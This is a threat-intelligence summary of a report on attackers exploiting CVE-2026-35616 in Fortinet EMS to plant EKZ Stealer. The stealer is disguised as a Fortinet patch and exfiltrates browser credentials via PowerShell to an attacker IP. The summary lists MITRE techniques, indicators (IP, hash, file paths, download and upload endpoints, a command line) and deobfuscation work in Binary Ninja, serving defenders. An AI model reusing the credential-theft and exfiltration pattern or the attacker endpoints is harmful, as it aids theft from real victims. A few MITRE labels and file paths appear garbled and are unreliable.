Fortinet Vulnerability CVE-2026-35616 and EKZ Stealer, Attacking Obfuscating Compilers with Binary Ninja Workflows

Fortinet Vulnerability CVE-2026-35616 and EKZ Stealer, Attacking Obfuscating Compilers with Binary Ninja Workflows
eSentire TRU found EKZ Stealer in a customer environment after attackers exploited CVE-2026-35616 against Fortinet EMS 7.4.5–7.4.6, masquerading the payload as FortiEndpoint_Patch.exe to harvest browser credentials and exfiltrate them via PowerShell. The report also details Binary Ninja workflow techniques used to deobfuscate EKZ Stealer’s control flow and recover its indirect jumps, calls, and string decryption logic. #EKZStealer #CVE-2026-35616 #FortinetEMS #FortiEndpoint_Patch.exe #BinaryNinja

Keypoints

  • eSentire TRU detected EKZ Stealer in May 2026 inside a customer environment in the Energy, Utilities & Waste industry.
  • The intrusion leveraged CVE-2026-35616, an improper access control flaw in Fortinet EMS versions 7.4.5 through 7.4.6.
  • Attackers disguised the stealer as FortiEndpoint_Patch.exe to make it look like a Fortinet update.
  • The malware harvested credentials from Chromium-based browsers and Firefox, then wrote them to C:ProgramDatalog.txt.
  • Stolen data was Base64-encoded and exfiltrated through an HTTP POST request to 83.138.53.110 using PowerShell.
  • The article explains how Binary Ninja Workflows can deobfuscate EKZ Stealer by resolving indirect jumps, indirect calls, and control-flow flattening.
  • TRU recommends patching Fortinet EMS, restricting access to trusted networks, and reviewing EMS logs for exploitation indicators.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Attackers compromised the Fortinet EMS server by exploiting CVE-2026-35616. (‘threat actors exploited CVE-2026-35616 in Fortinet EMS’)
  • [T1059.001] PowerShell – PowerShell was used to download, execute, sleep, encode data, and upload stolen credentials. (‘DownloadFile’, ‘Start-Process’, ‘Start-Sleep’, ‘UploadString’)
  • [T1005] Data from Local System – The stealer collected credentials stored on the victim host before exfiltration. (‘write stolen credentials to a file named log.txt’)
  • [T1027] Obfuscated Files or Information – The malware used compiler-based obfuscation, indirect jumps, control-flow flattening, and XOR string encryption to hinder analysis. (‘compiler-based obfuscations’, ‘control-flow flattening’, ‘XOR-based string encryption’)
  • [T1027.001] Binary Padding / Packed Obfuscated-like Content – The sample was compiled with obfuscating compiler behavior that distorted control flow and hid execution paths. (‘compiled with an obfuscating compiler that distorts control flow’)
  • [T1055] Process Injection – Not mentioned directly; no evidence in the article.
  • [T1105] Ingress Tool Transfer – The payload was downloaded from the remote host before execution. (‘downloads EKZ Infostealer’)
  • [T1041] Exfiltration Over C2 Channel – Stolen data was sent out via HTTP POST to the attacker infrastructure. (‘exfiltrating that file through an HTTP POST request’)

Indicators of Compromise

  • [IPv4] Dropper/exfiltration infrastructure used for download and POST exfiltration – 83.138.53.110, and 1 host
  • [File hash] EKZ Stealer sample distributed as FortiEndpoint_Patch.exe – 0da123adf9251957a4b850a3f6bd6a753dd4892be176a84a18450e899534cc5e
  • [File name] Default credential output file written by the stealer – C:programdatalog.txt
  • [File name] Disguised payload filename used in the attack chain – C:programdataFortiEndpoint_Patch.exe
  • [Command line] EKZ Stealer invocation noted in the article – runhlp.exe –v20-decrypt
  • [URL path] Download and exfiltration endpoints on the attacker server – /dl/p.exe, /service/save.php


Read more: https://www.esentire.com/blog/fortinet-vulnerability-cve-2026-35616-and-ekz-stealer-attacking-obfuscating-compilers-with-binary-ninja-workflows